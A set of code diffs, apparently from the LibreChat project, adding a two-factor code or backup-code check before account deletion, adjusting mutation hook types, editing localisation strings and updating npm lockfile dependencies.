<InputOTPSlot index={1} />
<InputOTPSlot index={2} />
</InputOTPGroup>
<InputOTPSeparator />
<InputOTPGroup>
<InputOTPSlot index={3} />
<InputOTPSlot index={4} />
<InputOTPSlot index={5} />
</InputOTPGroup>
</>
)}
</InputOTP>
</div>
<button
type="button"
onClick={() => {
setUseBackup(!useBackup);
setOtpToken('');
}}
className="text-sm text-primary hover:underline"
>
{useBackup ? localize('com_ui_use_2fa_code') : localize('com_ui_use_backup_code')}
</button>
</div>
)}
</motion.div>
</AnimatePresence>
</OGDialogContent>


@@ -1,16 +1,22 @@
import React, { useState, useCallback } from 'react';
import { LockIcon, Trash } from 'lucide-react';
import { REGEXP_ONLY_DIGITS, REGEXP_ONLY_DIGITS_AND_CHARS } from 'input-otp';
import {
InputOTPSeparator,
OGDialogContent,
OGDialogTrigger,
OGDialogHeader,
InputOTPGroup,
OGDialogTitle,
InputOTPSlot,
OGDialog,
InputOTP,
Spinner,
Button,
Label,
Input,
} from '@librechat/client';
import type { TDeleteUserRequest } from 'librechat-data-provider';
import { useDeleteUserMutation } from '~/data-provider';
import { useAuthContext } from '~/hooks/AuthContext';
import { LocalizeFunction } from '~/common';
@@ -21,16 +27,27 @@ const DeleteAccount = ({ disabled = false }: { title?: string; disabled?: boolea
const localize = useLocalize();
const { user, logout } = useAuthContext();
const { mutate: deleteUser, isLoading: isDeleting } = useDeleteUserMutation({
onSuccess: () => logout(),
});
const [isDialogOpen, setDialogOpen] = useState<boolean>(false);
const [isLocked, setIsLocked] = useState(true);
const [otpToken, setOtpToken] = useState('');
const [useBackup, setUseBackup] = useState(false);
const needs2FA = !!user?.twoFactorEnabled;
const handleDeleteUser = () => {
if (isLocked) {
return;
}
let payload: TDeleteUserRequest | undefined;
if (needs2FA && otpToken.trim()) {
payload = useBackup ? { backupCode: otpToken.trim() } : { token: otpToken.trim() };
}
deleteUser(payload);
};
const handleInputChange = useCallback(
@@ -42,6 +59,8 @@ const DeleteAccount = ({ disabled = false }: { title?: string; disabled?: boolea
[user?.email],
);
const otpReady = !needs2FA || otpToken.length === (useBackup ? 8 : 6);
return (
<>
<OGDialog open={isDialogOpen} onOpenChange={setDialogOpen}>
@@ -79,7 +98,60 @@ const DeleteAccount = ({ disabled = false }: { title?: string; disabled?: boolea
(e) => handleInputChange(e.target.value),
)}
</div>
{needs2FA && (
<div className="mb-4 space-y-3">
<Label className="text-sm font-medium">
{localize('com_ui_2fa_verification_required')}
</Label>
<div className="flex justify-center">
<InputOTP
value={otpToken}
onChange={setOtpToken}
maxLength={useBackup ? 8 : 6}
pattern={useBackup ? REGEXP_ONLY_DIGITS_AND_CHARS : REGEXP_ONLY_DIGITS}
className="gap-2"
>
{useBackup ? (
<InputOTPGroup>
<InputOTPSlot index={0} />
<InputOTPSlot index={1} />
<InputOTPSlot index={2} />
<InputOTPSlot index={3} />
<InputOTPSlot index={4} />
<InputOTPSlot index={5} />
<InputOTPSlot index={6} />
<InputOTPSlot index={7} />
</InputOTPGroup>
) : (
<>
<InputOTPGroup>
<InputOTPSlot index={0} />
<InputOTPSlot index={1} />
<InputOTPSlot index={2} />
</InputOTPGroup>
<InputOTPSeparator />
<InputOTPGroup>
<InputOTPSlot index={3} />
<InputOTPSlot index={4} />
<InputOTPSlot index={5} />
</InputOTPGroup>
</>
)}
</InputOTP>
</div>
<button
type="button"
onClick={() => {
setUseBackup(!useBackup);
setOtpToken('');
}}
className="text-sm text-primary hover:underline"
>
{useBackup ? localize('com_ui_use_2fa_code') : localize('com_ui_use_backup_code')}
</button>
</div>
)}
{renderDeleteButton(handleDeleteUser, isDeleting, isLocked || !otpReady, localize)}
</div>
</OGDialogContent>
</OGDialog>


@@ -68,14 +68,14 @@ export const useRefreshTokenMutation = (
/* User */
export const useDeleteUserMutation = (
options?: t.MutationOptions<unknown, t.TDeleteUserRequest | undefined>,
): UseMutationResult<unknown, unknown, t.TDeleteUserRequest | undefined, unknown> => {
const queryClient = useQueryClient();
const clearStates = useClearStates();
const resetDefaultPreset = useResetRecoilState(store.defaultPreset);
return useMutation([MutationKeys.deleteUser], {
mutationFn: (payload?: t.TDeleteUserRequest) => dataService.deleteUser(payload),
...(options || {}),
onSuccess: (...args) => {
resetDefaultPreset();
@@ -90,11 +90,11 @@ export const useDeleteUserMutation = (
export const useEnableTwoFactorMutation = (): UseMutationResult<
t.TEnable2FAResponse,
unknown,
t.TEnable2FARequest | undefined,
unknown
> => {
const queryClient = useQueryClient();
return useMutation((payload?: t.TEnable2FARequest) => dataService.enableTwoFactor(payload), {
onSuccess: (data) => {
queryClient.setQueryData([QueryKeys.user, '2fa'], data);
},
@@ -146,15 +146,18 @@ export const useDisableTwoFactorMutation = (): UseMutationResult<
export const useRegenerateBackupCodesMutation = (): UseMutationResult<
t.TRegenerateBackupCodesResponse,
unknown,
t.TRegenerateBackupCodesRequest | undefined,
unknown
> => {
const queryClient = useQueryClient();
return useMutation(
(payload?: t.TRegenerateBackupCodesRequest) => dataService.regenerateBackupCodes(payload),
{
onSuccess: (data) => {
queryClient.setQueryData([QueryKeys.user, '2fa', 'backup'], data);
},
},
);
};
export const useVerifyTwoFactorTempMutation = (


@@ -639,6 +639,7 @@
"com_ui_2fa_generate_error": "There was an error generating two-factor authentication settings",
"com_ui_2fa_invalid": "Invalid two-factor authentication code",
"com_ui_2fa_setup": "Setup 2FA",
"com_ui_2fa_verification_required": "Enter your 2FA code to continue",
"com_ui_2fa_verified": "Successfully verified Two-Factor Authentication",
"com_ui_accept": "I accept",
"com_ui_action_button": "Action Button",


@@ -1203,7 +1203,7 @@
"com_ui_upload_image_input": "Téléverser une image",
"com_ui_upload_invalid": "Fichier non valide pour le téléchargement. L'image ne doit pas dépasser la limite",
"com_ui_upload_invalid_var": "Fichier non valide pour le téléchargement. L'image ne doit pas dépasser {{0}} Mo",
"com_ui_upload_ocr_text": "Télécharger en tant que texte",
"com_ui_upload_provider": "Télécharger vers le fournisseur",
"com_ui_upload_success": "Fichier téléversé avec succès",
"com_ui_upload_type": "Sélectionner le type de téléversement",


@@ -39,7 +39,7 @@
"com_agents_description_card": "Apraksts: {{description}}",
"com_agents_description_placeholder": "Pēc izvēles: aprakstiet savu aģentu šeit",
"com_agents_empty_state_heading": "Nav atrasts neviens aģents",
"com_agents_enable_file_search": "Iespējot meklēšanu dokumentos",
"com_agents_error_bad_request_message": "Pieprasījumu nevarēja apstrādāt.",
"com_agents_error_bad_request_suggestion": "Lūdzu, pārbaudiet ievadītos datus un mēģiniet vēlreiz.",
"com_agents_error_category_title": "Kategorija Kļūda",
@@ -66,7 +66,7 @@
"com_agents_file_context_description": "Visi augšupielādētie faili tiek pilnībā pārveidoti tekstā un nekavējoties pievienoti aģenta pamata kontekstam kā nemainīgs saturs, kas pieejams visu sarunas laiku. Ja augšupielādētajam faila tipam ir pieejams vai konfigurēts OCR, teksta izvilkšana notiek automātiski. Šī metode ir piemērota gadījumos, kad nepieciešams analizēt visu dokumenta, attēla ar tekstu vai PDF faila saturu, taču jāņem vērā, ka tas ievērojami palielina atmiņas patēriņu un izmaksas.",
"com_agents_file_context_disabled": "Pirms failu augšupielādes, lai to pievienotu kā kontekstu, ir jāizveido aģents.",
"com_agents_file_context_label": "Pievienot failu kā kontekstu",
"com_agents_file_search_disabled": "Lai varētu iespējot meklēšanu dokumentos ir jāizveido aģents.",
"com_agents_file_search_info": "Kad šī opcija ir iespējota, aģents izmanto vektorizētu datu meklēšanu (RAG pieeju), kas ļauj efektīvi un izmaksu ziņā izdevīgi izgūt atbilstošu kontekstu tikai no būtiskākajām faila daļām, balstoties uz lietotāja jautājumu, nevis analizē visu failu pilnā apjomā.",
"com_agents_grid_announcement": "Rādu {{count}} aģentus {{category}} kategorijā",
"com_agents_instructions_placeholder": "Sistēmas instrukcijas, ko izmantos aģents",
@@ -126,7 +126,7 @@
"com_assistants_delete_actions_success": "Darbība veiksmīgi dzēsta no asistenta",
"com_assistants_description_placeholder": "Pēc izvēles: Šeit aprakstiet savu asistentu",
"com_assistants_domain_info": "Asistents nosūtīja šo informāciju {{0}}",
"com_assistants_file_search": "Meklēšana dokumentos",
"com_assistants_file_search_info": "Šī funkcija ļauj asistentam izmantot augšupielādēto failu saturu, pievienojot zināšanas tieši no lietotāja vai citu lietotāju failiem. Pēc faila augšupielādes asistents automātiski identificē un izgūst nepieciešamās teksta daļas atbilstoši lietotāja pieprasījumam, neiekļaujot visu failu pilnā apjomā. Vektoru datubāzu (vector store) pieslēgšana tieši šai funkcijai šobrīd nav atbalstīta; tās iespējams pievienot tikai Provider Playground vidē vai augšupielādējot failus sarunas pavedienam ikreizējai meklēšanai.",
"com_assistants_function_use": "Izmantotais asistents {{0}}",
"com_assistants_image_vision": "Attēla redzējums",
@ -136,7 +136,7 @@
"com_assistants_knowledge_info": "Ja augšupielādējat failus sadaļā Zināšanas, sarunās ar asistentu var tikt iekļauts faila saturs.", "com_assistants_knowledge_info": "Ja augšupielādējat failus sadaļā Zināšanas, sarunās ar asistentu var tikt iekļauts faila saturs.",
"com_assistants_max_starters_reached": "Sasniegts maksimālais sarunu uzsākšanas iespēju skaits", "com_assistants_max_starters_reached": "Sasniegts maksimālais sarunu uzsākšanas iespēju skaits",
"com_assistants_name_placeholder": "Pēc izvēles: Asistenta nosaukums", "com_assistants_name_placeholder": "Pēc izvēles: Asistenta nosaukums",
"com_assistants_non_retrieval_model": "Šajā modelī vektorizētā meklēšana nav iespējota. Lūdzu, izvēlieties citu modeli.", "com_assistants_non_retrieval_model": "Šajā modelī meklēšana dokumentos nav iespējota. Lūdzu, izvēlieties citu modeli.",
"com_assistants_retrieval": "Atgūšana", "com_assistants_retrieval": "Atgūšana",
"com_assistants_running_action": "Darbība palaista", "com_assistants_running_action": "Darbība palaista",
"com_assistants_running_var": "Strādā {{0}}", "com_assistants_running_var": "Strādā {{0}}",
@ -232,7 +232,7 @@
"com_endpoint_anthropic_thinking_budget": "Nosaka maksimālo žetonu skaitu, ko Claude drīkst izmantot savā iekšējā spriešanas procesā. Lielāki budžeti var uzlabot atbilžu kvalitāti, nodrošinot rūpīgāku analīzi sarežģītām problēmām, lai gan Claude var neizmantot visu piešķirto budžetu, īpaši diapazonos virs 32 000. Šim iestatījumam jābūt zemākam par \"Maksimālie izvades tokeni\".", "com_endpoint_anthropic_thinking_budget": "Nosaka maksimālo žetonu skaitu, ko Claude drīkst izmantot savā iekšējā spriešanas procesā. Lielāki budžeti var uzlabot atbilžu kvalitāti, nodrošinot rūpīgāku analīzi sarežģītām problēmām, lai gan Claude var neizmantot visu piešķirto budžetu, īpaši diapazonos virs 32 000. Šim iestatījumam jābūt zemākam par \"Maksimālie izvades tokeni\".",
"com_endpoint_anthropic_topk": "Top-k maina to, kā modelis atlasa marķierus izvadei. Ja top-k ir 1, tas nozīmē, ka atlasītais marķieris ir visticamākais starp visiem modeļa vārdu krājumā esošajiem marķieriem (to sauc arī par alkatīgo dekodēšanu), savukārt, ja top-k ir 3, tas nozīmē, ka nākamais marķieris tiek izvēlēts no 3 visticamākajiem marķieriem (izmantojot temperatūru).", "com_endpoint_anthropic_topk": "Top-k maina to, kā modelis atlasa marķierus izvadei. Ja top-k ir 1, tas nozīmē, ka atlasītais marķieris ir visticamākais starp visiem modeļa vārdu krājumā esošajiem marķieriem (to sauc arī par alkatīgo dekodēšanu), savukārt, ja top-k ir 3, tas nozīmē, ka nākamais marķieris tiek izvēlēts no 3 visticamākajiem marķieriem (izmantojot temperatūru).",
"com_endpoint_anthropic_topp": "`Top-p` maina to, kā modelis atlasa marķierus izvadei. Marķieri tiek atlasīti no K (skatīt parametru topK) ticamākās līdz vismazāk ticamajai, līdz to varbūtību summa ir vienāda ar `top-p` vērtību.", "com_endpoint_anthropic_topp": "`Top-p` maina to, kā modelis atlasa marķierus izvadei. Marķieri tiek atlasīti no K (skatīt parametru topK) ticamākās līdz vismazāk ticamajai, līdz to varbūtību summa ir vienāda ar `top-p` vērtību.",
"com_endpoint_anthropic_use_web_search": "Iespējojiet tīmekļa meklēšanas funkcionalitāti, izmantojot Anthropic iebūvētās meklēšanas iespējas. Tas ļauj modelim meklēt tīmeklī jaunāko informāciju un sniegt precīzākas un aktuālākas atbildes.", "com_endpoint_anthropic_use_web_search": "Iespējojiet meklēšanu tīmeklī funkcionalitāti, izmantojot Anthropic iebūvētās meklēšanas iespējas. Tas ļauj modelim meklēt tīmeklī jaunāko informāciju un sniegt precīzākas un aktuālākas atbildes.",
"com_endpoint_assistant": "Asistents", "com_endpoint_assistant": "Asistents",
"com_endpoint_assistant_model": "Asistenta modelis", "com_endpoint_assistant_model": "Asistenta modelis",
"com_endpoint_assistant_placeholder": "Lūdzu, labajā sānu panelī atlasiet asistentu.", "com_endpoint_assistant_placeholder": "Lūdzu, labajā sānu panelī atlasiet asistentu.",
@ -1486,7 +1486,7 @@
"com_ui_version_var": "Versija {{0}}", "com_ui_version_var": "Versija {{0}}",
"com_ui_versions": "Versijas", "com_ui_versions": "Versijas",
"com_ui_view_memory": "Skatīt atmiņu", "com_ui_view_memory": "Skatīt atmiņu",
"com_ui_web_search": "Tīmekļa meklēšana", "com_ui_web_search": "Meklēšana tīmeklī",
"com_ui_web_search_cohere_key": "Ievadiet Cohere API atslēgu", "com_ui_web_search_cohere_key": "Ievadiet Cohere API atslēgu",
"com_ui_web_search_firecrawl_url": "Firecrawl API URL (pēc izvēles)", "com_ui_web_search_firecrawl_url": "Firecrawl API URL (pēc izvēles)",
"com_ui_web_search_jina_key": "Ievadiet Jina API atslēgu", "com_ui_web_search_jina_key": "Ievadiet Jina API atslēgu",

package-lock.json

@@ -66,6 +66,7 @@
 "@modelcontextprotocol/sdk": "^1.27.1",
 "@node-saml/passport-saml": "^5.1.0",
 "@smithy/node-http-handler": "^4.4.5",
+"ai-tokenizer": "^1.0.6",
 "axios": "^1.13.5",
 "bcryptjs": "^2.4.3",
 "compression": "^1.8.1",
@@ -81,7 +82,7 @@
 "express-rate-limit": "^8.3.0",
 "express-session": "^1.18.2",
 "express-static-gzip": "^2.2.0",
-"file-type": "^18.7.0",
+"file-type": "^21.3.2",
 "firebase": "^11.0.2",
 "form-data": "^4.0.4",
 "handlebars": "^4.7.7",
@@ -121,10 +122,9 @@
 "pdfjs-dist": "^5.4.624",
 "rate-limit-redis": "^4.2.0",
 "sharp": "^0.33.5",
-"tiktoken": "^1.0.15",
 "traverse": "^0.6.7",
 "ua-parser-js": "^1.0.36",
-"undici": "^7.18.2",
+"undici": "^7.24.1",
 "winston": "^3.11.0",
 "winston-daily-rotate-file": "^5.0.0",
 "xlsx": "https://cdn.sheetjs.com/xlsx-0.20.3/xlsx-0.20.3.tgz",
@@ -270,6 +270,24 @@
 "node": ">= 0.8.0"
 }
 },
+"api/node_modules/file-type": {
+"version": "21.3.2",
+"resolved": "https://registry.npmjs.org/file-type/-/file-type-21.3.2.tgz",
+"integrity": "sha512-DLkUvGwep3poOV2wpzbHCOnSKGk1LzyXTv+aHFgN2VFl96wnp8YA9YjO2qPzg5PuL8q/SW9Pdi6WTkYOIh995w==",
+"license": "MIT",
+"dependencies": {
+"@tokenizer/inflate": "^0.4.1",
+"strtok3": "^10.3.4",
+"token-types": "^6.1.1",
+"uint8array-extras": "^1.4.0"
+},
+"engines": {
+"node": ">=20"
+},
+"funding": {
+"url": "https://github.com/sindresorhus/file-type?sponsor=1"
+}
+},
"api/node_modules/jose": { "api/node_modules/jose": {
"version": "6.1.3", "version": "6.1.3",
"resolved": "https://registry.npmjs.org/jose/-/jose-6.1.3.tgz", "resolved": "https://registry.npmjs.org/jose/-/jose-6.1.3.tgz",
@ -348,6 +366,40 @@
"@img/sharp-win32-x64": "0.33.5" "@img/sharp-win32-x64": "0.33.5"
} }
}, },
"api/node_modules/strtok3": {
"version": "10.3.4",
"resolved": "https://registry.npmjs.org/strtok3/-/strtok3-10.3.4.tgz",
"integrity": "sha512-KIy5nylvC5le1OdaaoCJ07L+8iQzJHGH6pWDuzS+d07Cu7n1MZ2x26P8ZKIWfbK02+XIL8Mp4RkWeqdUCrDMfg==",
"license": "MIT",
"dependencies": {
"@tokenizer/token": "^0.3.0"
},
"engines": {
"node": ">=18"
},
"funding": {
"type": "github",
"url": "https://github.com/sponsors/Borewit"
}
},
"api/node_modules/token-types": {
"version": "6.1.2",
"resolved": "https://registry.npmjs.org/token-types/-/token-types-6.1.2.tgz",
"integrity": "sha512-dRXchy+C0IgK8WPC6xvCHFRIWYUbqqdEIKPaKo/AcTUNzwLTK6AH7RjdLWsEZcAN/TBdtfUw3PYEgPr5VPr6ww==",
"license": "MIT",
"dependencies": {
"@borewit/text-codec": "^0.2.1",
"@tokenizer/token": "^0.3.0",
"ieee754": "^1.2.1"
},
"engines": {
"node": ">=14.16"
},
"funding": {
"type": "github",
"url": "https://github.com/sponsors/Borewit"
}
},
"api/node_modules/winston-daily-rotate-file": { "api/node_modules/winston-daily-rotate-file": {
"version": "5.0.0", "version": "5.0.0",
"resolved": "https://registry.npmjs.org/winston-daily-rotate-file/-/winston-daily-rotate-file-5.0.0.tgz", "resolved": "https://registry.npmjs.org/winston-daily-rotate-file/-/winston-daily-rotate-file-5.0.0.tgz",
@ -7286,6 +7338,16 @@
"dev": true, "dev": true,
"license": "MIT" "license": "MIT"
}, },
"node_modules/@borewit/text-codec": {
"version": "0.2.2",
"resolved": "https://registry.npmjs.org/@borewit/text-codec/-/text-codec-0.2.2.tgz",
"integrity": "sha512-DDaRehssg1aNrH4+2hnj1B7vnUGEjU6OIlyRdkMd0aUdIUvKXrJfXsy8LVtXAy7DRvYVluWbMspsRhz2lcW0mQ==",
"license": "MIT",
"funding": {
"type": "github",
"url": "https://github.com/sponsors/Borewit"
}
},
"node_modules/@braintree/sanitize-url": { "node_modules/@braintree/sanitize-url": {
"version": "7.1.1", "version": "7.1.1",
"resolved": "https://registry.npmjs.org/@braintree/sanitize-url/-/sanitize-url-7.1.1.tgz", "resolved": "https://registry.npmjs.org/@braintree/sanitize-url/-/sanitize-url-7.1.1.tgz",
@ -20799,6 +20861,41 @@
"@testing-library/dom": ">=7.21.4" "@testing-library/dom": ">=7.21.4"
} }
}, },
"node_modules/@tokenizer/inflate": {
"version": "0.4.1",
"resolved": "https://registry.npmjs.org/@tokenizer/inflate/-/inflate-0.4.1.tgz",
"integrity": "sha512-2mAv+8pkG6GIZiF1kNg1jAjh27IDxEPKwdGul3snfztFerfPGI1LjDezZp3i7BElXompqEtPmoPx6c2wgtWsOA==",
"license": "MIT",
"dependencies": {
"debug": "^4.4.3",
"token-types": "^6.1.1"
},
"engines": {
"node": ">=18"
},
"funding": {
"type": "github",
"url": "https://github.com/sponsors/Borewit"
}
},
"node_modules/@tokenizer/inflate/node_modules/token-types": {
"version": "6.1.2",
"resolved": "https://registry.npmjs.org/token-types/-/token-types-6.1.2.tgz",
"integrity": "sha512-dRXchy+C0IgK8WPC6xvCHFRIWYUbqqdEIKPaKo/AcTUNzwLTK6AH7RjdLWsEZcAN/TBdtfUw3PYEgPr5VPr6ww==",
"license": "MIT",
"dependencies": {
"@borewit/text-codec": "^0.2.1",
"@tokenizer/token": "^0.3.0",
"ieee754": "^1.2.1"
},
"engines": {
"node": ">=14.16"
},
"funding": {
"type": "github",
"url": "https://github.com/sponsors/Borewit"
}
},
"node_modules/@tokenizer/token": { "node_modules/@tokenizer/token": {
"version": "0.3.0", "version": "0.3.0",
"resolved": "https://registry.npmjs.org/@tokenizer/token/-/token-0.3.0.tgz", "resolved": "https://registry.npmjs.org/@tokenizer/token/-/token-0.3.0.tgz",
@ -22230,6 +22327,20 @@
"node": ">= 14" "node": ">= 14"
} }
}, },
"node_modules/ai-tokenizer": {
"version": "1.0.6",
"resolved": "https://registry.npmjs.org/ai-tokenizer/-/ai-tokenizer-1.0.6.tgz",
"integrity": "sha512-GaakQFxen0pRH/HIA4v68ZM40llCH27HUYUSBLK+gVuZ57e53pYJe1xFvSTj4sJJjbWU92m1X6NjPWyeWkFDow==",
"license": "MIT",
"peerDependencies": {
"ai": "^5.0.0"
},
"peerDependenciesMeta": {
"ai": {
"optional": true
}
}
},
"node_modules/ajv": { "node_modules/ajv": {
"version": "8.18.0", "version": "8.18.0",
"resolved": "https://registry.npmjs.org/ajv/-/ajv-8.18.0.tgz", "resolved": "https://registry.npmjs.org/ajv/-/ajv-8.18.0.tgz",
@@ -27499,22 +27610,6 @@
 "moment": "^2.29.1"
 }
 },
-"node_modules/file-type": {
-"version": "18.7.0",
-"resolved": "https://registry.npmjs.org/file-type/-/file-type-18.7.0.tgz",
-"integrity": "sha512-ihHtXRzXEziMrQ56VSgU7wkxh55iNchFkosu7Y9/S+tXHdKyrGjVK0ujbqNnsxzea+78MaLhN6PGmfYSAv1ACw==",
-"dependencies": {
-"readable-web-to-node-stream": "^3.0.2",
-"strtok3": "^7.0.0",
-"token-types": "^5.0.1"
-},
-"engines": {
-"node": ">=14.16"
-},
-"funding": {
-"url": "https://github.com/sindresorhus/file-type?sponsor=1"
-}
-},
 "node_modules/filelist": {
 "version": "1.0.6",
 "resolved": "https://registry.npmjs.org/filelist/-/filelist-1.0.6.tgz",
@@ -28803,9 +28898,9 @@
 "integrity": "sha512-24e6ynE2H+OKt4kqsOvNd8kBpV65zoxbA4BVsEOB3ARVWQki/DHzaUoC5KuON/BiccDaCCTZBuOcfZs70kR8bQ=="
 },
 "node_modules/hono": {
-"version": "4.12.5",
-"resolved": "https://registry.npmjs.org/hono/-/hono-4.12.5.tgz",
-"integrity": "sha512-3qq+FUBtlTHhtYxbxheZgY8NIFnkkC/MR8u5TTsr7YZ3wixryQ3cCwn3iZbg8p8B88iDBBAYSfZDS75t8MN7Vg==",
+"version": "4.12.7",
+"resolved": "https://registry.npmjs.org/hono/-/hono-4.12.7.tgz",
+"integrity": "sha512-jq9l1DM0zVIvsm3lv9Nw9nlJnMNPOcAtsbsgiUhWcFzPE99Gvo6yRTlszSLLYacMeQ6quHD6hMfId8crVHvexw==",
 "license": "MIT",
 "engines": {
 "node": ">=16.9.0"
@@ -35688,18 +35783,6 @@
 "node-readable-to-web-readable-stream": "^0.4.2"
 }
 },
-"node_modules/peek-readable": {
-"version": "5.0.0",
-"resolved": "https://registry.npmjs.org/peek-readable/-/peek-readable-5.0.0.tgz",
-"integrity": "sha512-YtCKvLUOvwtMGmrniQPdO7MwPjgkFBtFIrmfSbYmYuq3tKDV/mcfAhBth1+C3ru7uXIZasc/pHnb+YDYNkkj4A==",
-"engines": {
-"node": ">=14.16"
-},
-"funding": {
-"type": "github",
-"url": "https://github.com/sponsors/Borewit"
-}
-},
 "node_modules/pend": {
 "version": "1.2.0",
 "resolved": "https://registry.npmjs.org/pend/-/pend-1.2.0.tgz",
@@ -38505,21 +38588,6 @@
 "node": ">= 6"
 }
 },
-"node_modules/readable-web-to-node-stream": {
-"version": "3.0.2",
-"resolved": "https://registry.npmjs.org/readable-web-to-node-stream/-/readable-web-to-node-stream-3.0.2.tgz",
-"integrity": "sha512-ePeK6cc1EcKLEhJFt/AebMCLL+GgSKhuygrZ/GLaKZYEecIgIECf4UaUuaByiGtzckwR4ain9VzUh95T1exYGw==",
-"dependencies": {
-"readable-stream": "^3.6.0"
-},
-"engines": {
-"node": ">=8"
-},
-"funding": {
-"type": "github",
-"url": "https://github.com/sponsors/Borewit"
-}
-},
"node_modules/readdirp": { "node_modules/readdirp": {
"version": "3.6.0", "version": "3.6.0",
"resolved": "https://registry.npmjs.org/readdirp/-/readdirp-3.6.0.tgz", "resolved": "https://registry.npmjs.org/readdirp/-/readdirp-3.6.0.tgz",
@ -40906,22 +40974,6 @@
], ],
"license": "MIT" "license": "MIT"
}, },
"node_modules/strtok3": {
"version": "7.0.0",
"resolved": "https://registry.npmjs.org/strtok3/-/strtok3-7.0.0.tgz",
"integrity": "sha512-pQ+V+nYQdC5H3Q7qBZAz/MO6lwGhoC2gOAjuouGf/VO0m7vQRh8QNMl2Uf6SwAtzZ9bOw3UIeBukEGNJl5dtXQ==",
"dependencies": {
"@tokenizer/token": "^0.3.0",
"peek-readable": "^5.0.0"
},
"engines": {
"node": ">=14.16"
},
"funding": {
"type": "github",
"url": "https://github.com/sponsors/Borewit"
}
},
"node_modules/style-inject": { "node_modules/style-inject": {
"version": "0.3.0", "version": "0.3.0",
"resolved": "https://registry.npmjs.org/style-inject/-/style-inject-0.3.0.tgz", "resolved": "https://registry.npmjs.org/style-inject/-/style-inject-0.3.0.tgz",
@ -41485,11 +41537,6 @@
"node": ">=0.8" "node": ">=0.8"
} }
}, },
"node_modules/tiktoken": {
"version": "1.0.15",
"resolved": "https://registry.npmjs.org/tiktoken/-/tiktoken-1.0.15.tgz",
"integrity": "sha512-sCsrq/vMWUSEW29CJLNmPvWxlVp7yh2tlkAjpJltIKqp5CKf98ZNpdeHRmAlPVFlGEbswDc6SmI8vz64W/qErw=="
},
"node_modules/timers-browserify": { "node_modules/timers-browserify": {
"version": "2.0.12", "version": "2.0.12",
"resolved": "https://registry.npmjs.org/timers-browserify/-/timers-browserify-2.0.12.tgz", "resolved": "https://registry.npmjs.org/timers-browserify/-/timers-browserify-2.0.12.tgz",
@ -41631,22 +41678,6 @@
"node": ">=0.6" "node": ">=0.6"
} }
}, },
"node_modules/token-types": {
"version": "5.0.1",
"resolved": "https://registry.npmjs.org/token-types/-/token-types-5.0.1.tgz",
"integrity": "sha512-Y2fmSnZjQdDb9W4w4r1tswlMHylzWIeOKpx0aZH9BgGtACHhrk3OkT52AzwcuqTRBZtvvnTjDBh8eynMulu8Vg==",
"dependencies": {
"@tokenizer/token": "^0.3.0",
"ieee754": "^1.2.1"
},
"engines": {
"node": ">=14.16"
},
"funding": {
"type": "github",
"url": "https://github.com/sponsors/Borewit"
}
},
"node_modules/touch": { "node_modules/touch": {
"version": "3.1.0", "version": "3.1.0",
"resolved": "https://registry.npmjs.org/touch/-/touch-3.1.0.tgz", "resolved": "https://registry.npmjs.org/touch/-/touch-3.1.0.tgz",
@ -42197,6 +42228,18 @@
"resolved": "https://registry.npmjs.org/uid2/-/uid2-0.0.4.tgz", "resolved": "https://registry.npmjs.org/uid2/-/uid2-0.0.4.tgz",
"integrity": "sha512-IevTus0SbGwQzYh3+fRsAMTVVPOoIVufzacXcHPmdlle1jUpq7BRL+mw3dgeLanvGZdwwbWhRV6XrcFNdBmjWA==" "integrity": "sha512-IevTus0SbGwQzYh3+fRsAMTVVPOoIVufzacXcHPmdlle1jUpq7BRL+mw3dgeLanvGZdwwbWhRV6XrcFNdBmjWA=="
}, },
"node_modules/uint8array-extras": {
"version": "1.5.0",
"resolved": "https://registry.npmjs.org/uint8array-extras/-/uint8array-extras-1.5.0.tgz",
"integrity": "sha512-rvKSBiC5zqCCiDZ9kAOszZcDvdAHwwIKJG33Ykj43OKcWsnmcBRL09YTU4nOeHZ8Y2a7l1MgTd08SBe9A8Qj6A==",
"license": "MIT",
"engines": {
"node": ">=18"
},
"funding": {
"url": "https://github.com/sponsors/sindresorhus"
}
},
"node_modules/unbox-primitive": { "node_modules/unbox-primitive": {
"version": "1.1.0", "version": "1.1.0",
"resolved": "https://registry.npmjs.org/unbox-primitive/-/unbox-primitive-1.1.0.tgz", "resolved": "https://registry.npmjs.org/unbox-primitive/-/unbox-primitive-1.1.0.tgz",
@ -42229,9 +42272,9 @@
"license": "MIT" "license": "MIT"
}, },
"node_modules/undici": { "node_modules/undici": {
"version": "7.20.0", "version": "7.24.1",
"resolved": "https://registry.npmjs.org/undici/-/undici-7.20.0.tgz", "resolved": "https://registry.npmjs.org/undici/-/undici-7.24.1.tgz",
"integrity": "sha512-MJZrkjyd7DeC+uPZh+5/YaMDxFiiEEaDgbUSVMXayofAkDWF1088CDo+2RPg7B1BuS1qf1vgNE7xqwPxE0DuSQ==", "integrity": "sha512-5xoBibbmnjlcR3jdqtY2Lnx7WbrD/tHlT01TmvqZUFVc9Q1w4+j5hbnapTqbcXITMH1ovjq/W7BkqBilHiVAaA==",
"license": "MIT", "license": "MIT",
"engines": { "engines": {
"node": ">=20.18.1" "node": ">=20.18.1"
@ -44088,9 +44131,9 @@
} }
}, },
"node_modules/yauzl": { "node_modules/yauzl": {
"version": "3.2.0", "version": "3.2.1",
"resolved": "https://registry.npmjs.org/yauzl/-/yauzl-3.2.0.tgz", "resolved": "https://registry.npmjs.org/yauzl/-/yauzl-3.2.1.tgz",
"integrity": "sha512-Ow9nuGZE+qp1u4JIPvg+uCiUr7xGQWdff7JQSk5VGYTAZMDe2q8lxJ10ygv10qmSj031Ty/6FNJpLO4o1Sgc+w==", "integrity": "sha512-k1isifdbpNSFEHFJ1ZY4YDewv0IH9FR61lDetaRMD3j2ae3bIXGV+7c+LHCqtQGofSd8PIyV4X6+dHMAnSr60A==",
"dev": true, "dev": true,
"license": "MIT", "license": "MIT",
"dependencies": { "dependencies": {
@ -44200,6 +44243,7 @@
"@librechat/data-schemas": "*", "@librechat/data-schemas": "*",
"@modelcontextprotocol/sdk": "^1.27.1", "@modelcontextprotocol/sdk": "^1.27.1",
"@smithy/node-http-handler": "^4.4.5", "@smithy/node-http-handler": "^4.4.5",
"ai-tokenizer": "^1.0.6",
"axios": "^1.13.5", "axios": "^1.13.5",
"connect-redis": "^8.1.0", "connect-redis": "^8.1.0",
"eventsource": "^3.0.2", "eventsource": "^3.0.2",
@ -44222,8 +44266,7 @@
"node-fetch": "2.7.0", "node-fetch": "2.7.0",
"pdfjs-dist": "^5.4.624", "pdfjs-dist": "^5.4.624",
"rate-limit-redis": "^4.2.0", "rate-limit-redis": "^4.2.0",
"tiktoken": "^1.0.15", "undici": "^7.24.1",
"undici": "^7.18.2",
"zod": "^3.22.4" "zod": "^3.22.4"
} }
}, },


